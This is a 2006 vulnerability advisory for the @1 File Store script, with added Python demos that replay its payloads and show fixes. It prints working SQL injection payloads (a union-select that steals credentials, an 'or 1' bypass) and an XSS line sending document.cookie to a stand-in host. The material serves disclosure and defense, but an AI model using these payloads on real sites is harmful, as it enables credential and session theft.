Multiple XSS and SQL Injection in @1 File Store

Summary

Vulnerability
Multiple XSS and SQL Injection in @1 File Store
Discovered
2006.03.11
Last Update
2006.03.21 Exploitation code published
ID
EV0095
CVE
CVE-2006-1277 CVE-2006-1278
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. Vendor notified.
Vendor
n/a
Vulnerable Software
@1 File Store (http://www.upoint.info/cgi/download/)
Version
2006.03.07
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the @1 File Store (http://www.upoint.info/cgi/download/) script.

1. Multiple XSS Vulnerabilities

Vulnerable script: signup.php

The 'real_name', 'email' and 'login' parameters are not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.


2. Multiple SQL Injection Vulnerabilities

The 'id' parameter is not properly sanitized before being used in SQL queries. This can be used to execute arbitrary SQL by injecting SQL code.

The 'email' parameter in password.php is also not properly sanitized before being used in a SQL query and likewise allows arbitrary SQL queries to be executed.

Condition: magic_quotes_gpc = off (the PoCs below rely on an unescaped single quote to terminate the string literal; with magic quotes on, the quote is backslash-escaped and these particular payloads fail).

Vulnerable scripts:
libs/functions.php
libs/user.php
control/files/edit.php
control/files/delete.php
control/users/edit.php
control/users/delete.php
control/folders/edit.php
control/folders/access.php
control/folders/delete.php
control/groups/edit.php
control/groups/delete.php
confirm.php
download.php
password.php

PoC/Exploit

1. Cross-Site Scripting Example:

URL: http://[host]/filestore/signup.php
Real Name: [XSS]
E-mail: [XSS]
Login: [XSS]
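The following is an added example, not code from @1 File Store, showing what the unsanitized signup fields turn into once a page echoes them, and the output-time encoding that stops it. The page template and the sample submission are constructed for this illustration; only the field names (real_name, email, login) come from the advisory.

```python
"""
Added example (not @1 File Store code): an unescaped signup field becomes
stored XSS once a profile page echoes it; html.escape at output time fixes
both a text-node payload and an attribute-breaking one.
"""
import html

# Constructed signup submission. The field names are the ones the advisory
# reports as unsanitized; the values are attacker-supplied examples.
SIGNUP = {
    "login": "mallory",
    "real_name": "<script>document.location='http://evil.test/?c='+document.cookie</script>",
    "email": '" onmouseover="alert(1)',
}

# Hypothetical page template that prints the stored signup data back.
TEMPLATE = '<p>User: %s (%s)</p>\n<a href="mailto:%s">mail</a>'


def render_profile_vulnerable(user):
    """Raw interpolation: whatever was submitted at signup is emitted as HTML."""
    return TEMPLATE % (user["real_name"], user["login"], user["email"])


def render_profile_safe(user):
    """Same template with html.escape(quote=True) applied at output time.
    quote=True also encodes " and ', which is what keeps the email payload
    from closing the href attribute and adding an event handler."""
    def e(s):
        return html.escape(s, quote=True)
    return TEMPLATE % (e(user["real_name"]), e(user["login"]), e(user["email"]))


def contains_active_markup(page):
    """Cheap check: does the output still carry a script tag or an injected
    event-handler attribute in an active (unencoded) form?"""
    return "<script>" in page or 'onmouseover="' in page


if __name__ == "__main__":
    print(render_profile_vulnerable(SIGNUP))
    print(render_profile_safe(SIGNUP))
```

The fix is encoding at the point of output, not "sanitizing" on input: the same stored value is rendered in a text node and inside an attribute, and only context-aware escaping at output covers both.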


2. SQL Injection Examples:

URL: http://[host]/filestore/password.php
E-mail: 99999' union select 1,2,3,4,5,6,7,8,9,10,'hello','world','[send_to_email]',14,15,16/*

Registered user:
http://[host]/filestore/folder.php?id=999'%20or%201/*
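The following is an added example, not code from @1 File Store, that replays both SQL injection PoCs against a constructed SQLite table and shows the parameterized form that stops them. The real schema is not on the page: the 16-value payload above implies a 16-column users table with the e-mail in column 13, so this stand-in uses 4 columns and shortens the union payload accordingly. The query shapes in password_lookup_vulnerable and folder_lookup_vulnerable are assumptions about what password.php and folder.php do, and the "union_admin" payload goes beyond the advisory's literal PoC to show why the union matters: it puts a real user's stored credentials into the row whose e-mail column the script would mail to.

```python
"""
Added example (not @1 File Store code): the advisory's two SQL injection
PoCs against a constructed SQLite table, plus the parameterized fix.
"""
import sqlite3

# Constructed stand-in data. The real users table is not shown on the page;
# this one has 4 columns (id, login, password, email), so the union payloads
# below carry 4 values with the attacker-controlled e-mail last.
SAMPLE_USERS = [
    (1, "admin", "s3cret-admin-pw", "admin@example.test"),
    (2, "alice", "alice-pw", "alice@example.test"),
]
SAMPLE_FOLDERS = [(10, 1, "admin-private"), (11, 2, "alice-docs")]

ATTACKER_EMAIL = "attacker@evil.test"  # stands in for [send_to_email]

# The password.php payload from the advisory, shortened to 4 columns.
PAYLOAD_UNION = "99999' union select 1,'hello','world','%s'/*" % ATTACKER_EMAIL
# Extension of the same trick (not on the page): select the admin's stored
# login and password into the row that would be mailed to the attacker.
PAYLOAD_UNION_ADMIN = ("99999' union select 1,login,password,'%s' "
                       "from users where login='admin'/*" % ATTACKER_EMAIL)
# folder.php?id=999'%20or%201/* from the advisory, URL-decoded.
PAYLOAD_OR = "999' or 1/*"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, login TEXT, password TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?)", SAMPLE_USERS)
    db.execute("CREATE TABLE folders (id INTEGER, owner_id INTEGER, name TEXT)")
    db.executemany("INSERT INTO folders VALUES (?,?,?)", SAMPLE_FOLDERS)
    return db


# Vulnerable pattern (assumed shape of password.php / folder.php): the raw
# request value is pasted into the SQL text, so a single quote ends the
# literal and the trailing /* comments out whatever the script appends.
def password_lookup_vulnerable(db, email):
    sql = "SELECT * FROM users WHERE email='%s'" % email
    row = db.execute(sql).fetchone()
    # (login, password, address the script would mail the password to)
    return None if row is None else (row[1], row[2], row[3])


def folder_lookup_vulnerable(db, folder_id):
    sql = "SELECT id, owner_id, name FROM folders WHERE id='%s'" % folder_id
    return db.execute(sql).fetchall()


# Hardened pattern: the value travels as a bound parameter, never as SQL
# text, and the numeric id is type-checked before it reaches the database.
def password_lookup_safe(db, email):
    row = db.execute("SELECT login, password, email FROM users WHERE email=?",
                     (email,)).fetchone()
    return None if row is None else tuple(row)


def folder_lookup_safe(db, folder_id):
    try:
        folder_id = int(folder_id)
    except (TypeError, ValueError):
        return []
    return db.execute("SELECT id, owner_id, name FROM folders WHERE id=?",
                      (folder_id,)).fetchall()


def demo():
    """Run each payload through the vulnerable and the hardened lookups."""
    db = make_db()
    return {
        "union": password_lookup_vulnerable(db, PAYLOAD_UNION),
        "union_admin": password_lookup_vulnerable(db, PAYLOAD_UNION_ADMIN),
        "or_bypass": folder_lookup_vulnerable(db, PAYLOAD_OR),
        "union_safe": password_lookup_safe(db, PAYLOAD_UNION),
        "or_safe": folder_lookup_safe(db, PAYLOAD_OR),
        "legit_safe": folder_lookup_safe(db, "11"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Two things to note when adapting this to the real script: the number of values in the union must match the width of the table the script selects from (hence 16 on the page, 4 here), and the magic_quotes_gpc condition above matters because every payload depends on a literal single quote reaching the query unescaped.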

Solution

A solution for "Multiple XSS and SQL Injection in @1 File Store" is not available. Check the vendor's website for updates.